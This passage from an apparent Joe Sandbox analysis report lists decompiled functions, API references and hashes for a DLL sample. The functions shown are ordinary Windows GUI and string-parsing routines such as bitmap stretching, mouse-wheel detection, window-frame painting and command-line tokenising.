Part of subcall function 0072539C: 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725407
Part of subcall function 0072539C: 7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725411
Part of subcall function 0072539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725435
Part of subcall function 0072539C: 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725440

7378B410.GDI32(?,?,000000FF), ref: 00724D62
7378B150.GDI32(?,?,?,000000FF), ref: 00724D71
7378AD70.GDI32(?,0000000C), ref: 00724D83
7378AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00724D92
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00724DC5
SetStretchBltMode.GDI32(?,00000004), ref: 00724DD3
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00724DEB
SetStretchBltMode.GDI32(00000000,00000003), ref: 00724E08
7378A590.GDI32(00000000,00000000,00724EF1,?,?,0000000E,00000000,?,0000000C), ref: 00724E68
SelectObject.GDI32(?,?), ref: 00724E7D
SelectObject.GDI32(?,00000000), ref: 00724EDC
DeleteDC.GDI32(00000000), ref: 00724EEB

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
String ID:
API String ID: 3450332414-0
Opcode ID: 2e8b76477980d9f876db4c19b64516a0fe2add683e0e157d9b00b6f438f23cbc
Instruction ID: be3b114a4dfbe332210e1f59465d11d1e48501a2836dc15683ec42f10c062df7
Opcode Fuzzy Hash: 2e8b76477980d9f876db4c19b64516a0fe2add683e0e157d9b00b6f438f23cbc
Instruction Fuzzy Hash: FC7126B5A00215EFDB10DFACD999F5EBBF8AB48300F158554F618D7692D638ED10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00721184 Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00721184(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00706590();
				_v28 = __eax;
				_push(0);
				L00706590();
				_v32 = __eax;
				_push(_t87);
				_push(0x7212d2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L007068E8();
					_v24 = _t37;
					if(_v24 == 0) {
						E007210CC(__ecx);
					}
					_push(_t87);
					_push(0x721241);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00706588();
					_v20 = _t41;
					if(_v20 == 0) {
						E007210CC(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x721248);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00706B28();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00706578();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E007212D9);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x00721185
0x00721187
0x00721192
0x00721193
0x00721194
0x00721196
0x00721199
0x0072119b
0x007211a0
0x007211a3
0x007211a5
0x007211aa
0x007211af
0x007211b0
0x007211b5
0x007211b8
0x007211c5
0x007211cc
0x007211e6
0x007211e8
0x007211ed
0x007211f4
0x007211f6
0x007211f6
0x007211fd
0x007211fe
0x00721203
0x00721206
0x0072120c
0x00721210
0x00721211
0x00721214
0x00721215
0x0072121a
0x00721221
0x00721223
0x00721223
0x0072122a
0x0072122d
0x00721230
0x00721235
0x00721238
0x00721239
0x0072123b
0x00721240
0x007211ce
0x007211ce
0x007211d0
0x007211d2
0x007211d7
0x007211d8
0x007211db
0x007211dc
0x007211e1
0x0072124c
0x0072125b
0x0072126a
0x00721291
0x00721298
0x0072129f
0x0072129f
0x007212a6
0x007212ad
0x007212ad
0x007212a6
0x007212b4
0x007212b7
0x007212ba
0x007212c3
0x007212d1
0x007212d1

APIs

7378A590.GDI32(00000000), ref: 0072119B
7378A590.GDI32(00000000,00000000), ref: 007211A5
GetObjectA.GDI32(?,00000018,?), ref: 007211C5
7378A410.GDI32(?,?,00000001,00000001,00000000,00000000,007212D2,?,00000000,00000000), ref: 007211DC
7378AC50.USER32(00000000,00000000,007212D2,?,00000000,00000000), ref: 007211E8
7378A520.GDI32(00000000,?,?,00000000,00721241,?,00000000,00000000,007212D2,?,00000000,00000000), ref: 00721215
7378B380.USER32(00000000,00000000,00721248,00000000,00721241,?,00000000,00000000,007212D2,?,00000000,00000000), ref: 0072123B
SelectObject.GDI32(?,?), ref: 00721256
SelectObject.GDI32(?,00000000), ref: 00721265
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00721291
SelectObject.GDI32(?,00000000), ref: 0072129F
SelectObject.GDI32(?,00000000), ref: 007212AD
DeleteDC.GDI32(?), ref: 007212C3
DeleteDC.GDI32(?), ref: 007212CC

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 1734081924-0
Opcode ID: 2ac3ad2609a09f8635ff1db2fbf2a1ec10514beb235fe7a5c8dfbdfe98ca2052
Instruction ID: 31a8fd6c3d8ffae0f44572677b634b5b43ae406716e1e93b3eb86b4026879e14
Opcode Fuzzy Hash: 2ac3ad2609a09f8635ff1db2fbf2a1ec10514beb235fe7a5c8dfbdfe98ca2052
Instruction Fuzzy Hash: FD41EBB5E40219EFDB10EBE8DC56FAEB7FCFB09700F904564B604E7281D679A9508B60

Uniqueness

Uniqueness Score: -1.00%

Function 00706DC4 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00706DC4(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00706dcb
0x00706dcd
0x00706dcf
0x00706de1
0x00706df0
0x00706dfc
0x00706e08
0x00706e0d
0x00706e2c
0x00706e13
0x00706e23
0x00706e23
0x00706e31
0x00706e4e
0x00706e37
0x00706e47
0x00706e47
0x00706e5b

APIs

FindWindowA.USER32 ref: 00706DDC
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00706DE8
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00706DF7
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00706E03
SendMessageA.USER32 ref: 00706E1B
SendMessageA.USER32 ref: 00706E3F

Strings

MouseZ, xrefs: 00706DD7
Magellan MSWHEEL, xrefs: 00706DD2
MSH_WHEELSUPPORT_MSG, xrefs: 00706DF2
MSWHEEL_ROLLMSG, xrefs: 00706DE3
MSH_SCROLL_LINES_MSG, xrefs: 00706DFE

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: a7ac863787773003a616a3565d413d44b876fd07bbca9d9d22dc4d3bb4f74d32
Instruction ID: 16886c732bd1a778d2bef8a7b27e11d1a44821aa99486246e53592af4b9aa9e7
Opcode Fuzzy Hash: a7ac863787773003a616a3565d413d44b876fd07bbca9d9d22dc4d3bb4f74d32
Instruction Fuzzy Hash: 48112EF8340306EFE7109F64C8A5B6AB7E9FF45750F204625F8449B2C0D7B89C608B60

Uniqueness

Uniqueness Score: -1.00%

Function 0072B68C Relevance: 18.1, APIs: 12, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0072B68C(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E0074CFE0(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E0074CFE0(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E0074CFE0(_v8);
					_push(_t55);
					L007069E0();
					_v12 = _t55;
					_push(_t120);
					_push(0x72b7e7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E0074CFE0(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							L00715C48(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E0072B2C4( &_v56, 2);
					E0072B218(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x72b7ee);
					_push(_v12);
					_t74 = E0074CFE0(_v8);
					_push(_t74);
					L00706B28();
					return _t74;
				}
			}

0x0072b68d
0x0072b68f
0x0072b695
0x0072b697
0x0072b69a
0x0072b6a7
0x0072b6af
0x0072b7f4
0x0072b6b5
0x0072b6c2
0x0072b6d7
0x0072b6df
0x0072b6e4
0x0072b6e5
0x0072b6ea
0x0072b6ef
0x0072b6f0
0x0072b6f5
0x0072b6f8
0x0072b702
0x0072b703
0x0072b704
0x0072b705
0x0072b706
0x0072b709
0x0072b716
0x0072b720
0x0072b72b
0x0072b734
0x0072b743
0x0072b75d
0x0072b769
0x0072b76a
0x0072b76b
0x0072b76c
0x0072b76d
0x0072b77e
0x0072b77e
0x0072b720
0x0072b7a3
0x0072b7af
0x0072b7c2
0x0072b7c9
0x0072b7cc
0x0072b7cf
0x0072b7d7
0x0072b7db
0x0072b7e0
0x0072b7e1
0x0072b7e6
0x0072b7e6

APIs

GetWindowLongA.USER32 ref: 0072B6A7
GetWindowRect.USER32 ref: 0072B6C2
OffsetRect.USER32(?,?,?), ref: 0072B6D7
7378B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B6E5
GetWindowLongA.USER32 ref: 0072B716
GetSystemMetrics.USER32 ref: 0072B72B
GetSystemMetrics.USER32 ref: 0072B734
InflateRect.USER32(?,000000FE,000000FE), ref: 0072B743
GetSysColorBrush.USER32(0000000F), ref: 0072B770
FillRect.USER32 ref: 0072B77E
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0072B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B7A3
7378B380.USER32(00000000,?,0072B7EE,?,?,00000000,0072B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B7E1

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Rect$Window$7378LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
String ID:
API String ID: 3946395549-0
Opcode ID: ab951692c4e47271a7e7dff8ffec303a32739a82c3cf94e65ade783e1b93ca5e
Instruction ID: a77a210c5e1e5cb68174da2a588830cac1a37a1fd3f6b74672fbff0b612bd7db
Opcode Fuzzy Hash: ab951692c4e47271a7e7dff8ffec303a32739a82c3cf94e65ade783e1b93ca5e
Instruction Fuzzy Hash: 05411D72A04119EBCB01EAE8DD46EDFB7BDAF49310F144615F914F7281C738AE158760

Uniqueness

Uniqueness Score: -1.00%

Function 0072751C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0072751C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x76f923 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x76f910 = E00726F70(7, _t60,  *0x76f910, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00727525
0x00727528
0x00727532
0x00727562
0x00727568
0x00727624
0x0072762c
0x0072762c
0x00727570
0x00727575
0x00727580
0x0072758b
0x00727590
0x007275f9
0x00727611
0x00727622
0x0072760d
0x0072760d
0x0072760d
0x00000000
0x007275f9
0x0072759c
0x007275ab
0x00000000
0x00000000
0x007275bd
0x007275d5
0x007275eb
0x00000000
0x00000000
0x007275f1
0x007275f3
0x007275f3
0x00000000
0x00000000
0x00000000
0x00000000
0x007275d5
0x00727546
0x0072755b
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00727555
GetSystemMetrics.USER32 ref: 0072757A
GetSystemMetrics.USER32 ref: 00727585
GetClipBox.GDI32(?,?), ref: 00727597
GetDCOrgEx.GDI32(?,?), ref: 007275A4
OffsetRect.USER32(?,?,?), ref: 007275BD
IntersectRect.USER32 ref: 007275CE
IntersectRect.USER32 ref: 007275E4

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

EnumDisplayMonitors, xrefs: 00727534

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: b94891c1a9cf6c11fb7c95852dbcf4ca2afa6fde25e07b7967a93dd1d7e7518b
Instruction ID: b259b0d134c0708a76efe88f441bb5b4f785976ce16d3685accce406adf51cb0
Opcode Fuzzy Hash: b94891c1a9cf6c11fb7c95852dbcf4ca2afa6fde25e07b7967a93dd1d7e7518b
Instruction Fuzzy Hash: C7311EB2A05619AFDB15DFA8ED44AEFB7FCAB05300F008566F915E3240E778D911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00702908 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00702908(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E007046B4(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}

0x0070290c
0x0070290e
0x0070291a
0x0070291a
0x0070291a
0x0070291e
0x00702918
0x00702918
0x0070291a
0x0070291a
0x0070291e
0x00702918
0x00702918
0x00702924
0x00702927
0x00702934
0x00702936
0x0070297d
0x0070297d
0x00702981
0x00000000
0x00000000
0x0070293c
0x00702970
0x00702979
0x0070297b
0x00000000
0x0070297b
0x00702944
0x00702956
0x00702956
0x0070295a
0x00000000
0x00000000
0x00702949
0x00702952
0x00702954
0x00702954
0x00702963
0x0070296b
0x0070296b
0x00702963
0x00702987
0x0070298c
0x0070298e
0x00702990
0x007029e5
0x007029e5
0x007029e9
0x00000000
0x00000000
0x00702996
0x007029d1
0x007029d8
0x00000000
0x00000000
0x00000000
0x00000000
0x007029da
0x007029da
0x007029dc
0x007029df
0x007029e0
0x007029e1
0x00000000
0x007029da
0x0070299e
0x007029b7
0x007029b7
0x007029bb
0x00000000
0x00000000
0x007029a3
0x007029aa
0x00000000
0x00000000
0x00000000
0x00000000
0x007029ac
0x007029ac
0x007029ae
0x007029b1
0x007029b2
0x007029b3
0x007029ac
0x007029c4
0x007029cc
0x007029cc
0x007029c4
0x007029f1
0x0070292f
0x0070292f
0x00000000
0x0070292f
0x00702927

APIs

CharNextA.USER32 ref: 0070293F
CharNextA.USER32(00000000), ref: 00702949
CharNextA.USER32(00000000), ref: 00702966
CharNextA.USER32 ref: 00702970
CharNextA.USER32 ref: 00702999
CharNextA.USER32(00000000), ref: 007029A3
CharNextA.USER32(00000000), ref: 007029C7
CharNextA.USER32 ref: 007029D1

Strings

", xrefs: 00702924
", xrefs: 00702929

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CharNext
String ID: "$"
API String ID: 3213498283-3758156766
Opcode ID: a2b77ae3d682355ecca9e1fed75d41edc23b25bd3cfa69c5b620e9d4d0137245
Instruction ID: fc506523e7695fb480c90f8ad7736763b26fe89b4baa32f5e282a7fad01b71e9
Opcode Fuzzy Hash: a2b77ae3d682355ecca9e1fed75d41edc23b25bd3cfa69c5b620e9d4d0137245
Instruction Fuzzy Hash: F421E147728380EADF312AB85CCC3696BC94B5B304FA813A5D5C2AA2CBD45C6C87D225

Uniqueness

Uniqueness Score: -1.00%

Function 0074ADEC Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0074ADEC(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E0071707C( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(L0071FA64(0xff000010));
							L00715C48( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(L0071FA64(0xff000014));
							L00715C48( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E007170D8(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E0071707C( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							L00715C48( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00745268(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								L00747A98(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x0074adf0
0x0074adf3
0x0074adf5
0x0074adf7
0x0074ae00
0x0074ae1e
0x0074ae1e
0x0074ae21
0x0074ae29
0x0074af0e
0x0074af0e
0x0074af16
0x0074b01b
0x0074b01b
0x0074b01b
0x0074af1f
0x0074af22
0x00000000
0x00000000
0x0074af29
0x0074af2d
0x0074af2f
0x0074af37
0x0074af3c
0x0074af45
0x0074af7f
0x0074afa2
0x0074afad
0x0074afb7
0x0074afcc
0x0074afef
0x0074affa
0x0074b004
0x0074b004
0x0074b009
0x0074b00a
0x0074b00a
0x0074b00a
